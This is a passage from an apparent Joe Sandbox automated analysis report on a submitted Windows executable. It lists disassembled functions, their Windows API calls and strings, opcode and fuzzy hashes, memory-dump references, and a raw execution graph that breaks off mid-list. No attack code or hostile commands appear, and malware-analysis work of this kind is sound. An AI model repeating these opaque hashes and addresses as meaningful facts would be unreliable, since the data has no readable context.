                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                    • API String ID: 1061551593-3887548279
                                                                                                                                                                                                    • Opcode ID: a61c3114b9dfc8fb43b17047fb51cd919d8fb1951a7c7766ce87e238eb856cf5
                                                                                                                                                                                                    • Instruction ID: 7b7fb20ff2d9baa34eee8b76cec878303fd0ca404c126af6bce2ae4e038d6c23
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a61c3114b9dfc8fb43b17047fb51cd919d8fb1951a7c7766ce87e238eb856cf5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A291F171608755AFE714EF25C844A2BBBE9FFC9701F00491EF59AD3260DB30A946CB62
                                                                                                                                                                                                    Function 008775DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 008775E3
                                                                                                                                                                                                      • Part of subcall function 008805DA: _wcslen.LIBCMT ref: 008805E0
                                                                                                                                                                                                      • Part of subcall function 0087A56D: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0087A598
                                                                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0087777F
                                                                                                                                                                                                      • Part of subcall function 0087A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A501
                                                                                                                                                                                                      • Part of subcall function 0087A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A532
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                                                                                                    • Opcode ID: c48806e7eebfe8999d8856d3fdd7efd70a4da5358644d5688edd0e7b1ad162fd
                                                                                                                                                                                                    • Instruction ID: 4cae317a88fd1240361d3eed6b15277d824331f3ef88a4797f5f9d7ec8d01b14
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c48806e7eebfe8999d8856d3fdd7efd70a4da5358644d5688edd0e7b1ad162fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2416071805558A9EB25EB68CC95EEEB378FF51300F008096B64DE2096DB749F88CF72
                                                                                                                                                                                                    Function 0088B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID: }
                                                                                                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                                                                                                    • Opcode ID: 6a6b6eed76b13903f88f82001d29f9bbb47deb71960a2898ded04aa408362257
                                                                                                                                                                                                    • Instruction ID: 0fc3d33bfb6d21bb720b4266fe7ca1dc4d47c5353a9169c7a004410a835f4854
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a6b6eed76b13903f88f82001d29f9bbb47deb71960a2898ded04aa408362257
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6421AE7290470A5ADB32FAA8D845E6EB7ECFFD1754F14042AF680C7241EB65DD4883A3
                                                                                                                                                                                                    Function 0088DDA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsWindowVisible.USER32(00010464), ref: 0088DDDC
                                                                                                                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010464,0088B270,?,?), ref: 0088DE18
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogParamVisibleWindow
                                                                                                                                                                                                    • String ID: GETPASSWORD1
                                                                                                                                                                                                    • API String ID: 3157717868-3292211884
                                                                                                                                                                                                    • Opcode ID: 1ca48a17a80b0254bbd459fec771937792065a96b9532311977a442ad08e38ef
                                                                                                                                                                                                    • Instruction ID: 025df5c19ab4565f7c2bd6f89a92eb2e5b427daac3b02c274688a72bd29650bb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ca48a17a80b0254bbd459fec771937792065a96b9532311977a442ad08e38ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD112B32600258ABDB11EA38AC02BEF3798FB06351F148165BE49EB1C1C7B4AD84C764
                                                                                                                                                                                                    Function 0087F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0087F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087F2E4
                                                                                                                                                                                                      • Part of subcall function 0087F2C5: GetProcAddress.KERNEL32(008B81C8,CryptUnprotectMemory), ref: 0087F2F4
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0087F33E), ref: 0087F3D2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • CryptProtectMemory failed, xrefs: 0087F389
                                                                                                                                                                                                    • CryptUnprotectMemory failed, xrefs: 0087F3CA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                                                                                                    • Opcode ID: c8e59bba4ed14e1ad481e79769ff63a8de0a1330dfefc9cab18b11cf548874c5
                                                                                                                                                                                                    • Instruction ID: 86ff0074c199e9c139bee5ef2331937b98e0f5d55864e00830d075962ee5bed2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8e59bba4ed14e1ad481e79769ff63a8de0a1330dfefc9cab18b11cf548874c5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6110631605629ABEF115F3ADC45A6E3758FF01760F00C126FD09DB35ADA75DE018B91
                                                                                                                                                                                                    Function 0087B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0087B9B8
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                                                                                                                                    • String ID: %c:\
                                                                                                                                                                                                    • API String ID: 1543624204-3142399695
                                                                                                                                                                                                    • Opcode ID: ab0f7eb413f002bd25265bd41adb4f5385563151c2c835739cfa576f61ff8c09
                                                                                                                                                                                                    • Instruction ID: ba65d6c135930e68370a6dd378aee7c0c50e836113c285e79780b8e3a4a13ffe
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab0f7eb413f002bd25265bd41adb4f5385563151c2c835739cfa576f61ff8c09
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F101F563500321799A30BB798C86F6BF7ADFF92770B44C41AF558D6086FB20D85082B2
                                                                                                                                                                                                    Function 00871316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: _swprintf.LIBCMT ref: 0087E30E
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: _strlen.LIBCMT ref: 0087E32F
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: SetDlgItemTextW.USER32(?,008AE274,?), ref: 0087E38F
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: GetWindowRect.USER32(?,?), ref: 0087E3C9
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: GetClientRect.USER32(?,?), ref: 0087E3D5
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                                                                                                                    • Opcode ID: a88026ad12318bab95362ca37eeabcb00737f51ad63672eca3830abf98db9b4a
                                                                                                                                                                                                    • Instruction ID: 4dd3a8bfd1d7fc5a786988a880afb358853020a78ee5aed4281671041186a267
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a88026ad12318bab95362ca37eeabcb00737f51ad63672eca3830abf98db9b4a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBF08C30144289AADF151F68884EAEA3B68FB04344F04C216FD4CD4EA9CB78CA94AB20
                                                                                                                                                                                                    Function 00880FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00881101,?,?,0088117F,?,?,?,?,?,00881169), ref: 00880FEA
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0088117F,?,?,?,?,?,00881169), ref: 00880FF6
                                                                                                                                                                                                      • Part of subcall function 00876C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876C54
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00880FFF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                                                                                                    • Opcode ID: 0661423604a880d0e9c41b5ad7b285607fb2a8dca5af5197e78a6538bf2cd061
                                                                                                                                                                                                    • Instruction ID: 3d8f561303748469054051154bcdca3069e87828f38ca1b2ba81802ddb6000bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0661423604a880d0e9c41b5ad7b285607fb2a8dca5af5197e78a6538bf2cd061
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CD02B31508D2176DE1133285C09C6F7804FB63331F604704F13DE47E5DF1449925293
                                                                                                                                                                                                    Function 0087E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0087DA55,?), ref: 0087E2A3
                                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0087DA55,?), ref: 0087E2B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                                                                                                    • String ID: RTL
                                                                                                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                                                                                                    • Opcode ID: 95098487706c032f351210cd82a8606d8fbe7d6a055c00526357c697378b710d
                                                                                                                                                                                                    • Instruction ID: 27c99e479df1bd5f1a34e69e5ca3f7e05660d1cfec786c5f7fb2a26c6c7bbd17
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95098487706c032f351210cd82a8606d8fbe7d6a055c00526357c697378b710d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DC08031240F2066F73017747C0EF437E98BB02B15F05044CB145EA6D1D6E5D540C7E0

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:11.1%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                    Total number of Nodes:1560
                                                                                                                                                                                                    Total number of Limit Nodes:45
                                                                                                                                                                                                    execution_graph 25510 111710 86 API calls 25470 12ad10 73 API calls 25435 12a400 GdipDisposeImage GdipFree 25495 12d600 70 API calls 25436 136000 QueryPerformanceFrequency QueryPerformanceCounter 25473 13b100 FreeLibrary 25474 132900 6 API calls 4 library calls 25496 13f200 51 API calls 25512 13a700 21 API calls 25476 12f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25513 12ff30 LocalFree 25439 13c030 GetProcessHeap 25440 13f421 21 API calls __vsnwprintf_l 25497 12c220 93 API calls _swprintf 25442 111025 29 API calls 25477 13b4ae 27 API calls _ValidateLocalCookies 25445 12e455 14 API calls ___delayLoadHelper2@8 24241 12cd58 24242 12ce22 24241->24242 24248 12cd7b 24241->24248 24257 12c793 _wcslen _wcsrchr 24242->24257 24269 12d78f 24242->24269 24245 12d40a 24246 121fbb CompareStringW 24246->24248 24248->24242 24248->24246 24249 12ca67 SetWindowTextW 24249->24257 24254 12c855 SetFileAttributesW 24255 12c90f GetFileAttributesW 24254->24255 24267 12c86f __cftof _wcslen 24254->24267 24255->24257 24259 12c921 DeleteFileW 24255->24259 24257->24245 24257->24249 24257->24254 24260 12cc31 GetDlgItem SetWindowTextW SendMessageW 24257->24260 24263 12cc71 SendMessageW 24257->24263 24268 121fbb CompareStringW 24257->24268 24293 12b314 24257->24293 24297 12a64d GetCurrentDirectoryW 24257->24297 24299 11a5d1 6 API calls 24257->24299 24300 11a55a FindClose 24257->24300 24301 12b48e 76 API calls 2 library calls 24257->24301 24302 133e3e 24257->24302 24259->24257 24261 12c932 24259->24261 24260->24257 24262 114092 _swprintf 51 API calls 24261->24262 24264 12c952 GetFileAttributesW 24262->24264 24263->24257 24264->24261 24265 12c967 MoveFileW 24264->24265 24265->24257 24266 12c97f MoveFileExW 24265->24266 24266->24257 24267->24255 24267->24257 24298 11b991 51 API calls 2 library calls 24267->24298 24268->24257 24273 12d799 __cftof _wcslen 24269->24273 24270 12d9e7 24270->24257 24271 12d9c0 24271->24270 24277 12d9de ShowWindow 24271->24277 24272 12d8a5 24315 11a231 24272->24315 24273->24270 24273->24271 24273->24272 24318 121fbb CompareStringW 24273->24318 24277->24270 24278 12d8d9 ShellExecuteExW 24278->24270 24285 12d8ec 24278->24285 24280 12d8d1 24280->24278 24281 12d925 24320 12dc3b 6 API calls 24281->24320 24282 12d97b CloseHandle 24283 12d994 24282->24283 24284 12d989 24282->24284 24283->24271 24321 121fbb CompareStringW 24284->24321 24285->24281 24285->24282 24286 12d91b ShowWindow 24285->24286 24286->24281 24289 12d93d 24289->24282 24290 12d950 GetExitCodeProcess 24289->24290 24290->24282 24291 12d963 24290->24291 24291->24282 24294 12b31e 24293->24294 24295 12b3f0 ExpandEnvironmentStringsW 24294->24295 24296 12b40d 24294->24296 24295->24296 24296->24257 24297->24257 24298->24267 24299->24257 24300->24257 24301->24257 24303 138e54 24302->24303 24304 138e61 24303->24304 24305 138e6c 24303->24305 24330 138e06 24304->24330 24307 138e74 24305->24307 24313 138e7d _unexpected 24305->24313 24308 138dcc _free 20 API calls 24307->24308 24311 138e69 24308->24311 24309 138e82 24337 1391a8 20 API calls __dosmaperr 24309->24337 24310 138ea7 HeapReAlloc 24310->24311 24310->24313 24311->24257 24313->24309 24313->24310 24338 137a5e 7 API calls 2 library calls 24313->24338 24322 11a243 24315->24322 24318->24272 24319 11b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24319->24280 24320->24289 24321->24283 24323 12ec50 24322->24323 24324 11a250 GetFileAttributesW 24323->24324 24325 11a261 24324->24325 24326 11a23a 24324->24326 24327 11bb03 GetCurrentDirectoryW 24325->24327 24326->24278 24326->24319 24328 11a275 24327->24328 24328->24326 24329 11a279 GetFileAttributesW 24328->24329 24329->24326 24331 138e44 24330->24331 24335 138e14 _unexpected 24330->24335 24340 1391a8 20 API calls __dosmaperr 24331->24340 24333 138e2f RtlAllocateHeap 24334 138e42 24333->24334 24333->24335 24334->24311 24335->24331 24335->24333 24339 137a5e 7 API calls 2 library calls 24335->24339 24337->24311 24338->24313 24339->24335 24340->24334 25446 12a440 GdipCloneImage GdipAlloc 25499 133a40 5 API calls _ValidateLocalCookies 25516 141f40 CloseHandle 25448 12a070 10 API calls 25500 12b270 99 API calls 25519 111f72 128 API calls __EH_prolog 25450 111075 84 API calls 24398 119a74 24402 119a7e 24398->24402 24399 119ab1 24400 119b9d SetFilePointer 24400->24399 24401 119bb6 GetLastError 24400->24401 24401->24399 24402->24399 24402->24400 24404 119b79 24402->24404 24405 11981a 24402->24405 24404->24400 24406 119833 24405->24406 24408 119e80 79 API calls 24406->24408 24407 119865 24407->24404 24408->24407 24409 119f7a 24410 119f88 24409->24410 24411 119f8f 24409->24411 24412 119f9c GetStdHandle 24411->24412 24416 119fab 24411->24416 24412->24416 24413 11a003 WriteFile 24413->24416 24414 119fd4 WriteFile 24415 119fcf 24414->24415 24414->24416 24415->24414 24415->24416 24416->24410 24416->24413 24416->24414 24416->24415 24418 11a095 24416->24418 24420 116baa 78 API calls 24416->24420 24421 116e98 77 API calls 24418->24421 24420->24416 24421->24410 25452 12c793 107 API calls 4 library calls 25282 138268 25293 13bb30 25282->25293 25288 138dcc _free 20 API calls 25289 1382ba 25288->25289 25290 138290 25291 138dcc _free 20 API calls 25290->25291 25292 138285 25291->25292 25292->25288 25294 13827a 25293->25294 25295 13bb39 25293->25295 25297 13bf30 GetEnvironmentStringsW 25294->25297 25310 13ba27 25295->25310 25298 13bf47 25297->25298 25308 13bf9a 25297->25308 25301 13bf4d WideCharToMultiByte 25298->25301 25299 13bfa3 FreeEnvironmentStringsW 25300 13827f 25299->25300 25300->25292 25309 1382c0 26 API calls 4 library calls 25300->25309 25302 13bf69 25301->25302 25301->25308 25303 138e06 __vsnwprintf_l 21 API calls 25302->25303 25304 13bf6f 25303->25304 25305 13bf8c 25304->25305 25306 13bf76 WideCharToMultiByte 25304->25306 25307 138dcc _free 20 API calls 25305->25307 25306->25305 25307->25308 25308->25299 25308->25300 25309->25290 25311 1397e5 _unexpected 38 API calls 25310->25311 25312 13ba34 25311->25312 25330 13bb4e 25312->25330 25314 13ba3c 25339 13b7bb 25314->25339 25317 13ba53 25317->25294 25318 138e06 __vsnwprintf_l 21 API calls 25319 13ba64 25318->25319 25326 13ba96 25319->25326 25346 13bbf0 25319->25346 25322 138dcc _free 20 API calls 25322->25317 25323 13ba91 25356 1391a8 20 API calls __dosmaperr 25323->25356 25325 13bada 25325->25326 25357 13b691 26 API calls 25325->25357 25326->25322 25327 13baae 25327->25325 25328 138dcc _free 20 API calls 25327->25328 25328->25325 25331 13bb5a ___scrt_is_nonwritable_in_current_image 25330->25331 25332 1397e5 _unexpected 38 API calls 25331->25332 25333 13bb64 25332->25333 25337 13bbe8 _abort 25333->25337 25338 138dcc _free 20 API calls 25333->25338 25358 138d24 38 API calls _abort 25333->25358 25359 13ac31 EnterCriticalSection 25333->25359 25360 13bbdf LeaveCriticalSection _abort 25333->25360 25337->25314 25338->25333 25340 134636 __cftof 38 API calls 25339->25340 25341 13b7cd 25340->25341 25342 13b7ee 25341->25342 25343 13b7dc GetOEMCP 25341->25343 25344 13b805 25342->25344 25345 13b7f3 GetACP 25342->25345 25343->25344 25344->25317 25344->25318 25345->25344 25347 13b7bb 40 API calls 25346->25347 25348 13bc0f 25347->25348 25350 13bc60 IsValidCodePage 25348->25350 25353 13bc16 25348->25353 25355 13bc85 __cftof 25348->25355 25349 12fbbc _ValidateLocalCookies 5 API calls 25351 13ba89 25349->25351 25352 13bc72 GetCPInfo 25350->25352 25350->25353 25351->25323 25351->25327 25352->25353 25352->25355 25353->25349 25361 13b893 GetCPInfo 25355->25361 25356->25326 25357->25326 25359->25333 25360->25333 25367 13b8cd 25361->25367 25370 13b977 25361->25370 25364 12fbbc _ValidateLocalCookies 5 API calls 25366 13ba23 25364->25366 25366->25353 25371 13c988 25367->25371 25369 13ab78 __vsnwprintf_l 43 API calls 25369->25370 25370->25364 25372 134636 __cftof 38 API calls 25371->25372 25373 13c9a8 MultiByteToWideChar 25372->25373 25375 13c9e6 